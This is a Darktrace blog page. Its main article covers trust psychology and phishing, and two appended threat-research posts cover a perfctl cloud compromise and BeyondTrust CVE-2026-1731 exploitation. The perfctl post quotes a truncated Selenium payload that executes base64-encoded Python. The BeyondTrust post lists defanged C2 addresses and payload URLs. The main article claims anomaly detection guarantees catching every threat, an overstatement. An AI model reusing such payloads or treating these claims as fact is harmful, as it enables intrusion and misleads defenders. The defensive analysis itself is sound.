Blog
/
Email
/
July 18, 2023

Understanding Email Security & the Psychology of Trust

We explore how psychological research into the nature of trust relates to our relationship with technology - and what that means for AI solutions.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Hanah Darley
Director of Threat Research
Photo showing woman logging into her laptop with username and passwordDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
18
Jul 2023

When security teams discuss the possibility of phishing attacks targeting their organization, often the first reaction is to assume it is inevitable because of the users. Users are typically referenced in cyber security conversations as organizations’ greatest weaknesses, cited as the causes of many grave cyber-attacks because they click links, open attachments, or allow multi-factor authentication bypass without verifying the purpose.

While for many, the weakness of the user may feel like a fact rather than a theory, there is significant evidence to suggest that users are psychologically incapable of protecting themselves from exploitation by phishing attacks, with or without regular cyber awareness trainings. The psychology of trust and the nature of human reliance on technology make the preparation of users for the exploitation of that trust in technology very difficult – if not impossible.

This Darktrace long read will highlight principles of psychological and sociological research regarding the nature of trust, elements of the trust that relate to technology, and how the human brain is wired to rely on implicit trust. These principles all point to the outcome that humans cannot be relied upon to identify phishing. Email security driven by machine augmentation, such as AI anomaly detection, is the clearest solution to tackle that challenge.

What is the psychology of trust?

Psychological and sociological theories on trust largely centre around the importance of dependence and a two-party system: the trustor and the trustee. Most research has studied the impacts of trust decisions on interpersonal relationships, and the characteristics which make those relationships more or less likely to succeed. In behavioural terms, the elements most frequently referenced in trust decisions are emotional characteristics such as benevolence, integrity, competence, and predictability.1

Most of the behavioural evaluations of trust decisions survey why someone chooses to trust another person, how they made that decision, and how quickly they arrived at their choice. However, these micro-choices about trust require the context that trust is essential to human survival. Trust decisions are rooted in many of the same survival instincts which require the brain to categorize information and determine possible dangers. More broadly, successful trust relationships are essential in maintaining the fabric of human society, critical to every element of human life.

Trust can be compared to dark matter (Rotenberg, 2018), which is the extensive but often difficult to observe material that binds planets and earthly matter. In the same way, trust is an integral but often a silent component of human life, connecting people and enabling social functioning.2

Defining implicit and routine trust

As briefly mentioned earlier, dependence is an essential element of the trusting relationship. Being able to build a routine of trust, based on the maintenance rather than establishment of trust, becomes implicit within everyday life. For example, speaking to a friend about personal issues and life developments is often a subconscious reaction to the events occurring, rather than an explicit choice to trust said friend each time one has new experiences.

Active and passive levels of cognition are important to recognize in decision-making, such as trust choices. Decision-making is often an active cognitive process requiring a lot of resource from the brain. However, many decisions occur passively, especially if they are not new choices e.g. habits or routines. The brain’s focus turns to immediate tasks while relegating habitual choices to subconscious thought processes, passive cognition. Passive cognition leaves the brain open to impacts from inattentional blindness, wherein the individual may be abstractly aware of the choice but it is not the focus of their thought processes or actively acknowledged as a decision. These levels of cognition are mostly referenced as “attention” within the brain’s cognition and processing.3

This idea is essentially a concept of implicit trust, meaning trust which is occurring as background thought processes rather than active decision-making. This implicit trust extends to multiple areas of human life, including interpersonal relationships, but also habitual choice and lifestyle. When combined with the dependence on people and services, this implicit trust creates a haze of cognition where trust is implied and assumed, rather than actively chosen across a myriad of scenarios.

Trust and technology

As researchers at the University of Cambridge highlight in their research into trust and technology, ‘In a fundamental sense, all technology depends on trust.’  The same implicit trust systems which allow us to navigate social interactions by subconsciously choosing to trust, are also true of interactions with technology. The implied trust in technology and services is perhaps most easily explained by a metaphor.

Most people have a favourite brand of soda. People will routinely purchase that soda and drink it without testing it for chemicals or bacteria and without reading reviews to ensure the companies that produce it have not changed their quality standards. This is a helpful, representative example of routine trust, wherein the trust choice is implicit through habitual action and does not mean the person is actively thinking about the ramifications of continuing to use a product and trust it.

The principle of dependence is especially important in trust and technology discussions, because the modern human is entirely reliant on technology and so has no way to avoid trusting it.5   Specifically important in workplace scenarios, employees are given a mandatory set of technologies, from programs to devices and services, which they must interact with on a daily basis. Over time, the same implicit trust that would form between two people forms between the user and the technology. The key difference between interpersonal trust and technological trust is that deception is often much more difficult to identify.

The implicit trust in workplace technology

To provide a bit of workplace-specific context, organizations rely on technology providers for the operation (and often the security) of their devices. The organizations also rely on the employees (users) to use those technologies within the accepted policies and operational guidelines. The employees rely on the organization to determine which products and services are safe or unsafe.

Within this context, implicit trust is occurring at every layer of the organization and its technological holdings, but often the trust choice is only made annually by a small security team rather than continually evaluated. Systems and programs remain in place for years and are used because “that’s the way it’s always been done. Within that context, the exploitation of that trust by threat actors impersonating or compromising those technologies or services is extremely difficult to identify as a human.

For example, many organizations utilize email communications to promote software updates for employees. Typically, it would consist of email prompting employees to update versions from the vendors directly or from public marketplaces, such as App Store on Mac or Microsoft Store for Windows. If that kind of email were to be impersonated, spoofing an update and including a malicious link or attachment, there would be no reason for the employee to question that email, given the explicit trust enforced through habitual use of that service and program.

Inattentional blindness: How the brain ignores change

Users are psychologically predisposed to trust routinely used technologies and services, with most of those trust choices continuing subconsciously. Changes to these technologies would often be subject to inattentional blindness, a psychological phenomenon wherein the brain either overwrites sensory information with what the brain expects to see rather than what is actually perceived.

A great example of inattentional blindness6 is the following experiment, which asks individuals to count the number of times a ball is passed between multiple people. While that is occurring, something else is going on in the background, which, statistically, those tested will not see. The shocking part of this experiment comes after, when the researcher reveals that the event occurring in the background not seen by participants was a person in a gorilla suit moving back and forth between the group. This highlights how significant details can be overlooked by the brain and “overwritten” with other sensory information. When applied to technology, inattentional blindness and implicit trust makes spotting changes in behaviour, or indicators that a trusted technology or service has been compromised, nearly impossible for most humans to detect.

With all this in mind, how can you prepare users to correctly anticipate or identify a violation of that trust when their brains subconsciously make trust decisions and unintentionally ignore cues to suggest a change in behaviour? The short answer is, it’s difficult, if not impossible.

How threats exploit our implicit trust in technology

Most cyber threats are built around the idea of exploiting the implicit trust humans place in technology. Whether it’s techniques like “living off the land”, wherein programs normally associated with expected activities are leveraged to execute an attack, or through more overt psychological manipulation like phishing campaigns or scams, many cyber threats are predicated on the exploitation of human trust, rather than simply avoiding technological safeguards and building backdoors into programs.

In the case of phishing, it is easy to identify the attempts to leverage the trust of users in technology and services. The most common example of this would be spoofing, which is one of the most common tactics observed by Darktrace/Email. Spoofing is mimicking a trusted user or service, and can be accomplished through a variety of mechanisms, be it the creation of a fake domain meant to mirror a trusted link type, or the creation of an email account which appears to be a Human Resources, Internal Technology or Security service.

In the case of a falsified internal service, often dubbed a “Fake Support Spoof”, the user is exploited by following instructions from an accepted organizational authority figure and service provider, whose actions should normally be adhered to. These cases are often difficult to spot when studying the sender’s address or text of the email alone, but are made even more difficult to detect if an account from one of those services is compromised and the sender’s address is legitimate and expected for correspondence. Especially given the context of implicit trust, detecting deception in these cases would be extremely difficult.

How email security solutions can solve the problem of implicit trust

How can an organization prepare for this exploitation? How can it mitigate threats which are designed to exploit implicit trust? The answer is by using email security solutions that leverage behavioural analysis via anomaly detection, rather than traditional email gateways.

Expecting humans to identify the exploitation of their own trust is a high-risk low-reward endeavour, especially when it takes different forms, affects different users or portions of the organization differently, and doesn’t always have obvious red flags to identify it as suspicious. Cue email security using anomaly detection as the key answer to this evolving problem.

Anomaly detection enabled by machine learning and artificial intelligence (AI) removes the inattentional blindness that plagues human users and security teams and enables the identification of departures from the norm, even those designed to mimic expected activity. Using anomaly detection mitigates multiple human cognitive biases which might prevent teams from identifying evolving threats, and also guarantees that all malicious behaviour will be detected. Of course, anomaly detection means that security teams may be alerted to benign anomalous activity, but still guarantees that no threat, no matter how novel or cleverly packaged, won’t be identified and raised to the human security team.

Utilizing machine learning, especially unsupervised machine learning, mimics the benefits of human decision making and enables the identification of patterns and categorization of information without the framing and biases which allow trust to be leveraged and exploited.

For example, say a cleverly written email is sent from an address which appears to be a Microsoft affiliate, suggesting to the user that they need to patch their software due to the discovery of a new vulnerability. The sender’s address appears legitimate and there are news stories circulating on major media providers that a new Microsoft vulnerability is causing organizations a lot of problems. The link, if clicked, forwards the user to a login page to verify their Microsoft credentials before downloading the new version of the software. After logging in, the program is available for download, and only requires a few minutes to install. Whether this email was created by a service like ChatGPT (generative AI) or written by a person, if acted upon it would give the threat actor(s) access to the user’s credential and password as well as activate malware on the device and possibly broader network if the software is downloaded.

If we are relying on users to identify this as unusual, there are a lot of evidence points that enforce their implicit trust in Microsoft services that make them want to comply with the email rather than question it. Comparatively, anomaly detection-driven email security would flag the unusualness of the source, as it would likely not be coming from a Microsoft-owned IP address and the sender would be unusual for the organization, which does not normally receive mail from the sender. The language might indicate solicitation, an attempt to entice the user to act, and the link could be flagged as it contains a hidden redirect or tailored information which the user cannot see, whether it is hidden beneath text like “Click Here” or due to link shortening. All of this information is present and discoverable in the phishing email, but often invisible to human users due to the trust decisions made months or even years ago for known products and services.

AI-driven Email Security: The Way Forward

Email security solutions employing anomaly detection are critical weapons for security teams in the fight to stay ahead of evolving threats and varied kill chains, which are growing more complex year on year. The intertwining nature of technology, coupled with massive social reliance on technology, guarantees that implicit trust will be exploited more and more, giving threat actors a variety of avenues to penetrate an organization. The changing nature of phishing and social engineering made possible by generative AI is just a drop in the ocean of the possible threats organizations face, and most will involve a trusted product or service being leveraged as an access point or attack vector. Anomaly detection and AI-driven email security are the most practical solution for security teams aiming to prevent, detect, and mitigate user and technology targeting using the exploitation of trust.

References

1https://www.kellogg.northwestern.edu/trust-project/videos/waytz-ep-1.aspx

2Rotenberg, K.J. (2018). The Psychology of Trust. Routledge.

3https://www.cognifit.com/gb/attention

4https://www.trusttech.cam.ac.uk/perspectives/technology-humanity-society-democracy/what-trust-technology-conceptual-bases-common

5Tyler, T.R. and Kramer, R.M. (2001). Trust in organizations : frontiers of theory and research. Thousand Oaks U.A.: Sage Publ, pp.39–49.

6https://link.springer.com/article/10.1007/s00426-006-0072-4

Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Hanah Darley
Director of Threat Research

More in this series

No items found.

Blog

/

/

March 5, 2026

Inside Cloud Compromise: Investigating Attacker Activity with Darktrace / Forensic Acquisition & Investigation

Forensic Acquisition and investigationDefault blog imageDefault blog image

Investigating cloud attacks with Darktrace/ Forensic Acquisition & Investigation

Darktrace / Forensic Acquisition & Investigation™ is the industry’s first truly automated forensic solution purpose-built for the cloud. This blog will demonstrate how an investigation can be carried out against a compromised cloud server in minutes, rather than hours or days.

The compromised server investigated in this case originates from Darktrace’s Cloudypots system, a global honeypot network designed to observe adversary activity in real time across a wide range of cloud services. Whenever an attacker successfully compromises one of these honeypots, a forensic copy of the virtual server's disk is preserved for later analysis. Using Forensic Acquisition & Investigation, analysts can then investigate further and obtain detailed insights into the compromise including complete attacker timelines and root cause analysis.

Forensic Acquisition & Investigation supports importing artifacts from a variety of sources, including EC2 instances, ECS, S3 buckets, and more. The Cloudypots system produces a raw disk image whenever an attack is detected and stores it in an S3 bucket. This allows the image to be directly imported into Forensic Acquisition & Investigation using the S3 bucket import option.

As Forensic Acquisition & Investigation runs cloud-natively, no additional configuration is required to add a specific S3 bucket. Analysts can browse and acquire forensic assets from any bucket that the configured IAM role is permitted to access. Operators can also add additional IAM credentials, including those from other cloud providers, to extend access across multiple cloud accounts and environments.

Figure 1: Forensic Acquisition & Investigation import screen.

Forensic Acquisition & Investigation then retrieves a copy of the file and automatically begins running the analysis pipeline on the artifact. This pipeline performs a full forensic analysis of the disk and builds a timeline of the activity that took place on the compromised asset. By leveraging Forensic Acquisition & Investigation’s cloud-native analysis system, this process condenses hour of manual work into just minutes.

Successful import of a forensic artifact and initiation of the analysis pipeline.
Figure 2: Successful import of a forensic artifact and initiation of the analysis pipeline.

Once processing is complete, the preserved artifact is visible in the Evidence tab, along with a summary of key information obtained during analysis, such as the compromised asset’s hostname, operating system, cloud provider, and key event count.

The Evidence overview showing the acquired disk image.
Figure 3: The Evidence overview showing the acquired disk image.

Clicking on the “Key events” field in the listing opens the timeline view, automatically filtered to show system- generated alarms.

The timeline provides a chronological record of every event that occurred on the system, derived from multiple sources, including:

  • Parsed log files such as the systemd journal, audit logs, application specific logs, and others.
  • Parsed history files such as .bash_history, allowing executed commands to be shown on the timeline.
  • File-specific events, such as files being created, accessed, modified, or executables being run, etc.

This approach allows timestamped information and events from multiple sources to be aggregated and parsed into a single, concise view, greatly simplifying the data review process.

Alarms are created for specific timeline events that match either a built-in system rule, curated by Darktrace’s Threat Research team or an operator-defined rule  created at the project level. These alarms help quickly filter out noise and highlight on events of interest, such as the creation of a file containing known malware, access to sensitive files like Amazon Web Service (AWS) credentials, suspicious arguments or commands, and more.

 The timeline view filtered to alarm_severity: “1” OR alarm_severity: “3”, showing only events that matched an alarm rule.
Figure 4: The timeline view filtered to alarm_severity: “1” OR alarm_severity: “3”, showing only events that matched an alarm rule.

In this case, several alarms were generated for suspicious Base64 arguments being passed to Selenium. Examining the event data, it appears the attacker spawned a Selenium Grid session with the following payload:

"request.payload": "[Capabilities {browserName: chrome, goog:chromeOptions: {args: [-cimport base64;exec(base64...], binary: /usr/bin/python3, extensions: []}, pageLoadStrategy: normal}]"

This is a common attack vector for Selenium Grid. The chromeOptions object is intended to specify arguments for how Google Chrome should be launched; however, in this case the attacker has abused the binary field to execute the Python3 binary instead of Chrome. Combined with the option to specify command-line arguments, the attacker can use Python3’s -c option to execute arbitrary Python code, in this instance, decoding and executing a Base64 payload.

Selenium’s logs truncate the Arguments field automatically, so an alternate method is required to retrieve the full payload. To do this, the search bar can be used to find all events that occurred around the same time as this flagged event.

Pivoting off the previous event by filtering the timeline to events within the same window using timestamp: [“2026-02-18T09:09:00Z” TO “2026-02-18T09:12:00Z”].
Figure 5: Pivoting off the previous event by filtering the timeline to events within the same window using timestamp: [“2026-02-18T09:09:00Z” TO “2026-02-18T09:12:00Z”].

Scrolling through the search results, an entry from Java’s systemd journal can be identified. This log contains the full, unaltered payload. GCHQ’s CyberChef can then be used to decode the Base64 data into the attacker’s script, which will ultimately be executed.

Decoding the attacker’s payload in CyberChef.
Figure 6: Decoding the attacker’s payload in CyberChef.

In this instance, the malware was identified as a variant of a campaign that has been previously documented in depth by Darktrace.

Investigating Perfctl Malware

This campaign deploys a malware sample known as ‘perfctl to the compromised host. The script executed by the attacker downloads a Go binary named “promocioni.php” from 200[.]4.115.1. Its functionality is consistent with previously documented perfctl samples, with only minor changes such as updated filenames and a new command-and-control (C2) domain.

Perfctl is a stealthy malware that has several systems designed  to evade detection. The main binary is packed with UPX, with the header intentionally tampered with to prevent unpacking using regular tools. The binary also avoids executing any malicious code if it detects debugging or tracing activity, or if artifacts left by earlier stages are missing.

To further aid its evasive capabilities, perfctl features a usermode rootkit using an LD preload. This causes dynamically linked executables to load perfctl’s rootkit payload before other system modules, allowing it to override functions, such as intercepting calls to list files and hiding output from the returned list. Perfctl uses this to hide its own files, as well as other files like the ld.so.preload file, preventing users from identifying that a rootkit is present in the first place.

This also makes it difficult to dynamically analyze, as even analysts aware of the rootkit will struggle to get around it due to its aggressiveness in hiding its components. A useful trick is to use the busybox-static utilities, which are statically linked and therefore immune to LD preloading.

Perfctl will attempt to use sudo to escalate its permissions to root if the user it was executed as has the required privileges. Failing this, it will attempt to exploit the vulnerability CVE-2021-4034.

Ultimately, perfctl will attempt to establish a C2 link via Tor and spawn an XMRig miner to mine the Monero cryptocurrency. The traffic to the mining pool is encapsulated within Tor to limit network detection of the mining traffic.

Darktrace’s Cloudypots system has observed 1,959 infections of the perfctl campaign across its honeypot network in the past year, making it one of the most aggressive campaigns seen by Darktrace.

Key takeaways

This blog has shown how Darktrace / Forensic Acquisition & Investigation equips defenders in the face of a real-world attacker campaign. By using this solution, organizations can acquire forensic evidence and investigate intrusions across multiple cloud resources and providers, enabling defenders to see the full picture of an intrusion on day one. Forensic Acquisition & Investigation’s patented data-processing system takes advantage of the cloud’s scale to rapidly process large amounts of data, allowing triage to take minutes, not hours.

Darktrace / Forensic Acquisition & Investigation is available as Software-as-a-Service (SaaS) but can also be deployed on-premises as a virtual application or natively in the cloud, providing flexibility between convenience and data sovereignty to suit any use case.

Support for acquiring traditional compute instances like EC2, as well as more exotic and newly targeted platforms such as ECS and Lambda, ensures that attacks taking advantage of Living-off-the-Cloud (LOTC) strategies can be triaged quickly and easily as part of incident response. As attackers continue to develop new techniques, the ability to investigate how they use cloud services to persist and pivot throughout an environment is just as important to triage as a single compromised EC2 instance.

Credit to Nathaniel Bill (Malware Research Engineer)

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer

Blog

/

Network

/

February 19, 2026

CVE-2026-1731: How Darktrace Sees the BeyondTrust Exploitation Wave Unfolding

Default blog imageDefault blog image

Note: Darktrace's Threat Research team is publishing now to help defenders. We will continue updating this blog as our investigations unfold.

Background

On February 6, 2026, the Identity & Access Management solution BeyondTrust announced patches for a vulnerability, CVE-2026-1731, which enables unauthenticated remote code execution using specially crafted requests.  This vulnerability affects BeyondTrust Remote Support (RS) and particular older versions of Privileged Remote Access (PRA) [1].

A Proof of Concept (PoC) exploit for this vulnerability was released publicly on February 10, and open-source intelligence (OSINT) reported exploitation attempts within 24 hours [2].

Previous intrusions against Beyond Trust technology have been cited as being affiliated with nation-state attacks, including a 2024 breach targeting the U.S. Treasury Department. This incident led to subsequent emergency directives from  the Cybersecurity and Infrastructure Security Agency (CISA) and later showed attackers had chained previously unknown vulnerabilities to achieve their goals [3].

Additionally, there appears to be infrastructure overlap with React2Shell mass exploitation previously observed by Darktrace, with command-and-control (C2) domain  avg.domaininfo[.]top seen in potential post-exploitation activity for BeyondTrust, as well as in a React2Shell exploitation case involving possible EtherRAT deployment.

Darktrace Detections

Darktrace’s Threat Research team has identified highly anomalous activity across several customers that may relate to exploitation of BeyondTrust since February 10, 2026. Observed activities include:

Outbound connections and DNS requests for endpoints associated with Out-of-Band Application Security Testing; these services are commonly abused by threat actors for exploit validation.  Associated Darktrace models include:

  • Compromise / Possible Tunnelling to Bin Services

Suspicious executable file downloads. Associated Darktrace models include:

  • Anomalous File / EXE from Rare External Location

Outbound beaconing to rare domains. Associated Darktrace models include:

  • Compromise / Agent Beacon (Medium Period)
  • Compromise / Agent Beacon (Long Period)
  • Compromise / Sustained TCP Beaconing Activity To Rare Endpoint
  • Compromise / Beacon to Young Endpoint
  • Anomalous Server Activity / Rare External from Server
  • Compromise / SSL Beaconing to Rare Destination

Unusual cryptocurrency mining activity. Associated Darktrace models include:

  • Compromise / Monero Mining
  • Compromise / High Priority Crypto Currency Mining

And model alerts for:

  • Compromise / Rare Domain Pointing to Internal IP

IT Defenders: As part of best practices, we highly recommend employing an automated containment solution in your environment. For Darktrace customers, please ensure that Autonomous Response is configured correctly. More guidance regarding this activity and suggested actions can be found in the Darktrace Customer Portal.  

Appendices

Potential indicators of post-exploitation behavior:

·      217.76.57[.]78 – IP address - Likely C2 server

·      hXXp://217.76.57[.]78:8009/index.js - URL -  Likely payload

·      b6a15e1f2f3e1f651a5ad4a18ce39d411d385ac7  - SHA1 - Likely payload

·      195.154.119[.]194 – IP address – Likely C2 server

·      hXXp://195.154.119[.]194/index.js - URL – Likely payload

·      avg.domaininfo[.]top – Hostname – Likely C2 server

·      104.234.174[.]5 – IP address - Possible C2 server

·      35da45aeca4701764eb49185b11ef23432f7162a – SHA1 – Possible payload

·      hXXp://134.122.13[.]34:8979/c - URL – Possible payload

·      134.122.13[.]34 – IP address – Possible C2 server

·      28df16894a6732919c650cc5a3de94e434a81d80 - SHA1 - Possible payload

References:

1.        https://nvd.nist.gov/vuln/detail/CVE-2026-1731

2.        https://www.securityweek.com/beyondtrust-vulnerability-targeted-by-hackers-within-24-hours-of-poc-release/

3.        https://www.rapid7.com/blog/post/etr-cve-2026-1731-critical-unauthenticated-remote-code-execution-rce-beyondtrust-remote-support-rs-privileged-remote-access-pra/

Continue reading
About the author
Emma Foulger
Global Threat Research Operations Lead
Your data. Our AI.
Elevate your network security with Darktrace AI